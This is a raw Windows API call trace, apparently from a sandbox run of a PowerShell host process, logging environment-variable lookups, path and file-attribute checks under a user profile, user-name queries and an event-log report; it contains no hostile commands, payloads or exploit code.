	[0230.474] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.474] CoTaskMemFree (pv=0x221840) 
	[0230.474] CoTaskMemAlloc (cb=0x104) returned 0x221840
	[0230.474] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.474] CoTaskMemFree (pv=0x221840) 
	[0230.489] CoTaskMemAlloc (cb=0x104) returned 0x221840
	[0230.489] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.489] CoTaskMemFree (pv=0x221840) 
	[0230.495] CoTaskMemAlloc (cb=0x104) returned 0x221840
	[0230.495] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.495] CoTaskMemFree (pv=0x221840) 
	[0230.497] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x12d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0230.497] SetErrorMode (uMode=0x1) returned 0x1
	[0230.497] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x12d530 | out: lpFileInformation=0x12d530*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0230.497] SetErrorMode (uMode=0x1) returned 0x1
	[0230.497] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x12d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0230.497] SetErrorMode (uMode=0x1) returned 0x1
	[0230.497] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x12d530 | out: lpFileInformation=0x12d530*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0230.497] SetErrorMode (uMode=0x1) returned 0x1
	[0230.498] CoTaskMemAlloc (cb=0x104) returned 0x221840
	[0230.498] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.498] CoTaskMemFree (pv=0x221840) 
	[0231.151] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x12d470, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0231.153] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0231.154] SetErrorMode (uMode=0x1) returned 0x1
	[0231.154] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d4f0 | out: lpFileInformation=0x12d4f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0231.154] SetErrorMode (uMode=0x1) returned 0x1
	[0231.154] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0231.154] SetErrorMode (uMode=0x1) returned 0x1
	[0231.154] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d4f0 | out: lpFileInformation=0x12d4f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0231.154] SetErrorMode (uMode=0x1) returned 0x1
	[0231.154] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0231.154] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0231.154] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x12d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0231.154] SetErrorMode (uMode=0x1) returned 0x1
	[0231.155] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x12d4f0 | out: lpFileInformation=0x12d4f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0231.155] SetErrorMode (uMode=0x1) returned 0x1
	[0231.155] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x12d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0231.155] SetErrorMode (uMode=0x1) returned 0x1
	[0231.155] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x12d4f0 | out: lpFileInformation=0x12d4f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0231.155] SetErrorMode (uMode=0x1) returned 0x1
	[0231.155] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x12d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0231.155] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x12d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0231.155] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x12d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0231.155] SetErrorMode (uMode=0x1) returned 0x1
	[0231.155] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x12d4f0 | out: lpFileInformation=0x12d4f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0231.155] SetErrorMode (uMode=0x1) returned 0x1
	[0231.156] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x12d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0231.156] SetErrorMode (uMode=0x1) returned 0x1
	[0231.156] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x12d4f0 | out: lpFileInformation=0x12d4f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0231.156] SetErrorMode (uMode=0x1) returned 0x1
	[0231.156] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x12d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0231.156] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0x12d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0231.156] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x12d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0231.156] SetErrorMode (uMode=0x1) returned 0x1
	[0231.156] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x12d4f0 | out: lpFileInformation=0x12d4f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0231.156] SetErrorMode (uMode=0x1) returned 0x1
	[0231.156] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x12d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0231.156] SetErrorMode (uMode=0x1) returned 0x1
	[0231.157] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x12d4f0 | out: lpFileInformation=0x12d4f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0231.157] SetErrorMode (uMode=0x1) returned 0x1
	[0231.157] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x12d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0231.157] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\.", nBufferLength=0x105, lpBuffer=0x12d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0231.157] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x12d320, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0231.157] SetErrorMode (uMode=0x1) returned 0x1
	[0231.157] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x12d530 | out: lpFileInformation=0x12d530*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0231.157] SetErrorMode (uMode=0x1) returned 0x1
	[0231.157] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x12d320, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0231.157] SetErrorMode (uMode=0x1) returned 0x1
	[0231.158] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x12d530 | out: lpFileInformation=0x12d530*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0231.158] SetErrorMode (uMode=0x1) returned 0x1
	[0231.158] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x12d330, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0231.158] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x12d220, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0231.158] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x12d320, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0231.158] SetErrorMode (uMode=0x1) returned 0x1
	[0231.158] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x12d530 | out: lpFileInformation=0x12d530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0231.158] SetErrorMode (uMode=0x1) returned 0x1
	[0231.158] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x12d320, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0231.158] SetErrorMode (uMode=0x1) returned 0x1
	[0231.158] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x12d530 | out: lpFileInformation=0x12d530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0231.158] SetErrorMode (uMode=0x1) returned 0x1
	[0231.159] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x12d330, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0231.159] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0x12d220, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0231.159] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x12d320, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0231.159] SetErrorMode (uMode=0x1) returned 0x1
	[0231.159] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x12d530 | out: lpFileInformation=0x12d530*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0231.159] SetErrorMode (uMode=0x1) returned 0x1
	[0231.159] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x12d320, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0231.159] SetErrorMode (uMode=0x1) returned 0x1
	[0231.159] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x12d530 | out: lpFileInformation=0x12d530*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0231.159] SetErrorMode (uMode=0x1) returned 0x1
	[0231.159] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x12d330, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0231.159] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\.", nBufferLength=0x105, lpBuffer=0x12d220, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0231.169] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x12d590, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0231.169] SetErrorMode (uMode=0x1) returned 0x1
	[0231.169] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x12d7f0 | out: lpFileInformation=0x12d7f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0231.169] SetErrorMode (uMode=0x1) returned 0x1
	[0231.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0240.845] CoTaskMemAlloc (cb=0x804) returned 0x1b8de680
	[0240.845] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8de680, nSize=0x12db58 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x12db58) returned 0x1
	[0240.845] CoTaskMemFree (pv=0x1b8de680) 
	[0240.845] CoTaskMemAlloc (cb=0x204) returned 0x1640a0
	[0240.845] GetUserNameW (in: lpBuffer=0x1640a0, pcbBuffer=0x12db98 | out: lpBuffer="aETAdzjz", pcbBuffer=0x12db98) returned 1
	[0240.845] CoTaskMemFree (pv=0x1640a0) 
	[0240.847] ReportEventW (hEventLog=0x1b9b0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fe1ea0*="Available", lpRawData=0x2fe1c30) returned 1
	[0241.195] CoTaskMemAlloc (cb=0x104) returned 0x221840
	[0241.195] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0241.195] CoTaskMemFree (pv=0x221840) 
	[0241.196] CoTaskMemAlloc (cb=0x104) returned 0x221840
	[0241.196] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0241.196] CoTaskMemFree (pv=0x221840) 
	[0241.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.203] CoTaskMemAlloc (cb=0x104) returned 0x221840
	[0241.203] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x221840, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0241.203] CoTaskMemFree (pv=0x221840) 
	[0241.203] CoTaskMemAlloc (cb=0x104) returned 0x221840
	[0241.203] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x221840, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf
	[0241.203] CoTaskMemFree (pv=0x221840) 
	[0241.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
